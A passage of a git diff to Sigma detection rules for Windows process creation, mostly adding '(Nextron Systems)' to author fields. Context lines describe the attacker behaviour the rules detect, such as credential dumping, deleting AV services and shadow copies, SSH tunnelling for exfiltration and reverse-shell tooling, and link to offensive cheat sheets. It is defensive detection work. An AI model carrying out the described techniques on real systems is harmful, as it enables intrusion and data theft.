b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml index 1e30ba1c5..4accee8d4 100644 --- a/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml +++ b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml @@ -5,7 +5,7 @@ description: Detects usage of the Quarks PwDump tool via commandline arguments references: - https://github.com/quarkslab/quarkspwdump - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/05 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml b/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml index 6ad785f4a..6b8b2b605 100644 --- a/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml +++ b/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 modified: 2023/01/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml b/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml index 1e60e08a3..c2a38e6ff 100644 --- a/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml +++ b/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml @@ -4,7 +4,7 @@ status: test description: This command line patterns found in BlackByte Ransomware operations references: - https://redcanary.com/blog/blackbyte-ransomware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/25 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml b/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml index dabffeceb..88412dd13 100644 --- a/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml +++ b/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml @@ -2,7 +2,7 @@ title: Raspberry Robin Dot Ending File id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a status: experimental description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) references: - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ date: 2022/10/28 diff --git a/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml b/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml index 02275baaa..dec5679d5 100644 --- a/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml +++ b/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml @@ -5,7 +5,7 @@ description: Detects RDP session hijacking by using MSTSC shadowing references: - https://twitter.com/kmkz_security/status/1220694202301976576 - https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/01/24 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml index f654508bf..e216cb8ff 100644 --- a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml +++ b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml @@ -5,7 +5,7 @@ description: Detects a suspicious output redirection to the local admins share, references: - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/16 modified: 2022/09/09 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml index ba2cce1b8..cfc7d3217 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml @@ -5,7 +5,7 @@ description: Detects suspicious command line reg.exe tool adding key to RUN key references: - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/ - https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/06/28 modified: 2023/01/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml index d22a080a4..9b7110016 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml @@ -7,7 +7,7 @@ status: experimental description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not references: - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/02 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml b/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml index aa75ba237..dcacb2b59 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml @@ -5,7 +5,7 @@ description: Detects reg command lines that disable certain important features o references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ - https://github.com/swagkarna/Defeat-Defender-V1.2.0 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/22 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml b/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml index be5a0b2df..75906f81b 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml @@ -7,7 +7,7 @@ status: experimental description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html -author: Nasreddine Bencherchali, Tim Shelton +author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton date: 2022/08/08 modified: 2022/08/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml b/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml index 223e02eb4..080e31374 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services references: - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml index caeb706e9..e64e20c9a 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' subkeys references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T' +author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T (Nextron Systems)' date: 2022/02/12 modified: 2022/09/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml b/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml index 9a863e6ce..cc5677a47 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/22 modified: 2023/01/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml index ffc2260d7..54a382a8b 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml @@ -19,7 +19,7 @@ references: - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks - https://twitter.com/christophetd/status/1164506034720952320 - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ -author: Matthew Green - @mgreen27, Florian Roth, frack113 +author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113 date: 2019/06/15 modified: 2023/01/23 tags: diff --git a/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml b/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml index 7ddb6a472..2502f66cf 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) references: - https://twitter.com/mariuszbit/status/1531631015139102720 -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2022/06/02 tags: - attack.t1528 diff --git a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml index 0abcaf1fe..d43e959fb 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process creation with a renamed Msdt.exe references: - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ -author: pH-T +author: pH-T (Nextron Systems) date: 2022/06/03 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml b/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml index 7660f221d..fc4c10b5f 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings references: - https://redcanary.com/blog/misbehaving-rats/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml b/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml index ec89ae388..9f17b26f8 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of a renamed office binaries references: - https://infosec.exchange/@sbousseaden/109542254124022664 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/20 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_renamed_plink.yml b/rules/windows/process_creation/proc_creation_win_renamed_plink.yml index 0c0082fa3..07354f9e0 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_plink.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_plink.yml @@ -5,7 +5,7 @@ description: Execution of a renamed version of the Plink binary references: - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ - https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/06 modified: 2022/08/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml b/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml index 0e7a7715a..e7071719b 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml @@ -7,7 +7,7 @@ status: test description: Detects the execution of a renamed ProcDump executable often used by attackers or malware references: - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/11/18 modified: 2022/12/08 tags: diff --git a/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml b/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml index c3a495b97..d52d8db30 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml @@ -8,7 +8,7 @@ description: Detects when 'DllRegisterServer' is called in the commandline and t references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/22 modified: 2023/01/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml b/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml index 4a955383b..3213606c2 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field references: - https://redcanary.com/blog/misbehaving-rats/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml index 0f751c056..2ebafff91 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml @@ -5,7 +5,7 @@ description: Detects the use of a renamed SysInternals Sdelete, which is somethi references: - https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/06 tags: - attack.impact diff --git a/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml b/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml index cedf389d6..846719a0b 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml @@ -5,7 +5,7 @@ description: Detects the execution of whoami that has been renamed to a differen references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/12 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml b/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml index b8d02dd2d..e1a101883 100644 --- a/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml @@ -6,7 +6,7 @@ references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 - https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html - https://twitter.com/cyb3rops/status/1514217991034097664 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/13 tags: - attack.initial_access diff --git a/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml index 5d9a0d1e5..e34a064cd 100644 --- a/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml @@ -5,7 +5,7 @@ description: Detects execution of ruby using the "-e" flag. This is could be use references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/02 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml b/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml index db4dddade..94a2271a2 100644 --- a/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml +++ b/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of rundll32 with a command line that doesn't contain a .dll file references: - https://twitter.com/mrd0x/status/1481630810495139841?s=12 -author: Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp) +author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp) date: 2022/01/13 modified: 2023/01/25 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml b/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml index efed71c08..0e0f9217f 100644 --- a/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml +++ b/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml @@ -4,7 +4,7 @@ status: experimental description: Detects rundll32 execution where the DLL is located on a remote location (share) references: - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/10 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml b/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml index e3645cf89..e817b0c40 100644 --- a/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml +++ b/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml @@ -4,7 +4,7 @@ status: experimental description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml b/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml index d502517fb..2f6f2ed42 100644 --- a/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml +++ b/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml @@ -4,7 +4,7 @@ status: experimental description: 'Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local' references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: 'pH-T, Nasreddine Bencherchali' +author: 'pH-T (Nextron Systems), Nasreddine Bencherchali' date: 2022/03/15 modified: 2022/07/28 tags: diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml b/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml index acdafd14d..df599fa50 100644 --- a/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml +++ b/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml @@ -4,7 +4,7 @@ status: experimental description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte -author: pH-T +author: pH-T (Nextron Systems) date: 2022/07/15 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml b/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml index 6dd67db17..598d992c5 100644 --- a/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory) references: - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ -author: 'pH-T, Florian Roth' +author: 'pH-T (Nextron Systems), Florian Roth' date: 2022/04/08 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml b/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml index 55586acbd..c19083d12 100644 --- a/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml +++ b/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T' +author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T (Nextron Systems)' date: 2022/02/12 modified: 2022/03/15 tags: diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_system.yml b/rules/windows/process_creation/proc_creation_win_schtasks_system.yml index 784d00cad..67fe1e960 100644 --- a/rules/windows/process_creation/proc_creation_win_schtasks_system.yml +++ b/rules/windows/process_creation/proc_creation_win_schtasks_system.yml @@ -5,7 +5,7 @@ description: Detects the creation or update of a scheduled task to run with "NT references: - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml b/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml index e6dfb85f2..690e3f001 100644 --- a/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml @@ -5,7 +5,7 @@ description: Detects suspicious sub processes started by the ScreenConnect clien references: - https://www.mandiant.com/resources/telegram-malware-iranian-espionage - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/25 modified: 2022/07/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_selectmyparent.yml b/rules/windows/process_creation/proc_creation_win_selectmyparent.yml index f61a2159b..70e01edc2 100644 --- a/rules/windows/process_creation/proc_creation_win_selectmyparent.yml +++ b/rules/windows/process_creation/proc_creation_win_selectmyparent.yml @@ -7,7 +7,7 @@ references: - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks - https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing - https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/23 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml b/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml index 7844a5267..2e0c2c18d 100644 --- a/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml +++ b/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml @@ -11,7 +11,7 @@ status: experimental description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine references: - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml b/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml index 715a8526f..7ce2e9319 100644 --- a/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml +++ b/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml @@ -12,7 +12,7 @@ references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware -author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) +author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/10/22 modified: 2022/11/03 tags: diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml index ed5fe8397..6741fa4fa 100644 --- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml @@ -8,7 +8,7 @@ description: Detects usage of the Sharp Chisel via the commandline arguments references: - https://github.com/shantanu561993/SharpChisel - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/05 modified: 2022/09/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml b/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml index 326d40318..32654d7fd 100644 --- a/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml +++ b/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. references: - https://github.com/p0dalirius/LDAPmonitor -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/30 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_sharpup.yml b/rules/windows/process_creation/proc_creation_win_sharpup.yml index 73e49d592..000734e5a 100644 --- a/rules/windows/process_creation/proc_creation_win_sharpup.yml +++ b/rules/windows/process_creation/proc_creation_win_sharpup.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of SharpUp, a tool for local privilege escalation references: - https://github.com/GhostPack/SharpUp -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/20 modified: 2022/10/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml b/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml index 41f079839..571bbd100 100644 --- a/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml +++ b/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc. references: - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Florian Roth, Tim Shelton +author: Florian Roth (Nextron Systems), Tim Shelton date: 2018/04/06 modified: 2023/01/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml b/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml index 1032d7364..6cf6d94e0 100644 --- a/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml +++ b/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious SSH tunnel port forwarding to a local port references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/12 modified: 2023/01/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml b/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml index 98a0ec15d..d2ab3821e 100644 --- a/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml +++ b/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml @@ -7,7 +7,7 @@ status: experimental description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/12 modified: 2023/01/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml b/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml index 8b52c2f45..db2c06811 100644 --- a/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml +++ b/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml @@ -7,7 +7,7 @@ status: test description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - 